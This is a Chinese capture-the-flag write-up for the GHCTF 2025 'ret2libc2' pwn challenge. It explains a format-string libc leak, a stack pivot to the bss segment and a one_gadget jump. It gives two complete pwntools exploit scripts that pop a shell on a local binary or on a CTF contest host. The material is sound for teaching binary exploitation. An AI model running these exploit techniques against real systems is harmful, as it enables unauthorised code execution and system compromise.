栈迁移与onegadget利用[GHCTF 2025]ret2libc2

ida 看 main 函数

跟进 func 函数

原以为可以直接打 ret2libc,但是这里没有程序没有 pop rdi

不过这里存在格式化字符串漏洞,也可以用来泄露 libc

我们直接看汇编

虽然 format 被初始化为 "hello world!"

但是它就在 buf 下面,后面的 read 我们可以读入 0x60

因此我们就可以覆盖 format,利用 printf 来泄露 libc 里的真实地址

这里 rax 存的就是 buf,我们溢出后劫持程序到 0x401227,即指令:

复制代码
mov rdi, rax 

后面再次执行 printf 函数,打印出真实地址,我们就可以计算 libc 基址了

然后程序会继续执行 read 函数,我们又可以溢出,劫持到 system 从而 getshell

大致利用思路就是这样,那么我们先找一下偏移

我一开始想直接用这个 __libc_start_call_main

但是在 libc 的符号表里面没有找到

后面换用 __libc_start_main

可以看到,这里 __libc_start_main+128 的偏移是 27

计算基址:

python 复制代码
libc_base = libc_start_main_128 - 128 - libc.symbols['__libc_start_main']

但是这里还有一个问题

正常的函数开头会有:

python 复制代码
push rbp
mov rbp, rsp
sub rsp, xxx

由于我们劫持到了函数的中间位置(0x401227)

栈帧没被设置,rbp 如果被我们填成了垃圾数据,后面 leave 指令就会出问题

因为 rsp 指向了一块无意义的数据,pop rbp 和 ret 都会崩掉

因此 rbp 不能随便填充

我们就需要进行栈迁移,我们一般迁移到 bss 段,可控可写

因为程序没有 pop rdi,我们在 libc 里面找

ret 都有,随便用一个即可

python 复制代码
pop_rdi = libc_base + 0x2a3e5
ret_addr = libc_base + 0x29139
#ret_addr = 0x40101a

按理来说我们就可以打 ret2libc 了

编写 exp:

python 复制代码
# @author:My6n
# @time:20250525
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
io = process('./pwn')
#io = remote('node1.anna.nssctf.cn',28712)
elf = ELF('./pwn')
bss_addr = 0x404060
payload1 = b'%27$p'.ljust(0x30,b'\x00') + p64(bss_addr) + p64(0x401227)

io.sendline(payload1)
io.recvuntil('0x')
libc_start_main_128 = int(io.recv(12),16)
print(hex(libc_start_main_128))

#libc = ELF('libc.so.6') 
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = libc_start_main_128 - 128 - libc.symbols['__libc_start_main']
system_addr = libc_base + libc.symbols['system']
bin_sh_addr = libc_base + next(libc.search('/bin/sh'))
pop_rdi = libc_base + 0x2a3e5
ret_addr = libc_base + 0x29139
#ret_addr = 0x40101a

payload2 = cyclic(0x30) + p64(bss_addr) + p64(ret_addr) + p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)
io.sendline(payload2)
io.interactive()

但是这里没有打通

结合题目提示,需要打 onegadget

那么我们就直接打 onegadget呗

我们尽量让 rbp 往高地址靠,这样容易满足 [rbp-0x70]=NULL 的条件

这里试了下,下面的两个都是可以的:

python 复制代码
onegadget = 0xebc81 + libc_base
onegadget = 0xebd43 + libc_base

编写 exp:

python 复制代码
# @author:My6n
# @time:20250525
from pwn import *
context(arch = 'amd64',os = 'linux',log_level = 'debug')
#io = process('./pwn')
io = remote('node1.anna.nssctf.cn',28712)
elf = ELF('./pwn')
bss_addr = 0x404060
payload=b'%27$p'.ljust(0x30,b'\x00') + p64(bss_addr) + p64(0x401227)

io.sendline(payload)
io.recvuntil('0x')
libc_start_call_main_128 = int(io.recv(12),16)
print(hex(libc_start_call_main_128))

libc = 	ELF('libc.so.6') 
libc_base = libc_start_call_main_128 - 128 - libc.symbols['__libc_start_main']
system_addr = libc_base + libc.symbols['system']
bin_sh_addr = libc_base + next(libc.search('/bin/sh'))
pop_rdi = libc_base + 0x2a3e5
#ret_addr = libc_base + 0x29139
ret_addr = 0x40101a

#onegadget = 0xebc81 + libc_base
onegadget = 0xebd43 + libc_base
#payload2 = cyclic(0x30) + p64(bss_addr) + p64(ret_addr) + p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)

payload2 = cyclic(0x30) + p64(bss_addr+0x100) + p64(onegadget)
io.sendline(payload2)
io.interactive()

可以打通,没有问题

拿到 flag: NSSCTF{ac2d7858-c021-430a-ba8d-e5b6d14139da}

相关推荐
派大星爱吃猫9 小时前
堆的概念、结构与应用详解
c语言·数据结构·
wfsec15 小时前
区块链安全评估:守护数字世界的“安全密码”
安全·区块链
一念&18 小时前
每日一个C语言知识:C 结构体
c语言·开发语言
jianghx102418 小时前
Docker部署ES,开启安全认证并且设置账号密码(已运行中)
安全·elasticsearch·docker·es账号密码设置
GilgameshJSS18 小时前
STM32H743-ARM例程24-USB_MSC
c语言·arm开发·stm32·单片机·嵌入式硬件
w236173460119 小时前
Linux 服务器安全巡检与加固:从命令到实操(CentOS/Ubuntu 通用)
linux·服务器·安全·安全加固·安全巡检
小莞尔19 小时前
【51单片机】【protues仿真】基于51单片机电压测量多量程系统
c语言·单片机·嵌入式硬件·物联网·51单片机
星哥说事20 小时前
网络安全设备:入侵检测系统(IDS)、入侵防御系统(IPS)的配置与使用
网络·安全·web安全
李白你好20 小时前
一个Burp Suite插件,用于自动化检测图片上传功能中的XSS漏洞
安全·自动化·xss
Code小翊1 天前
C语言bsearch的使用
java·c语言·前端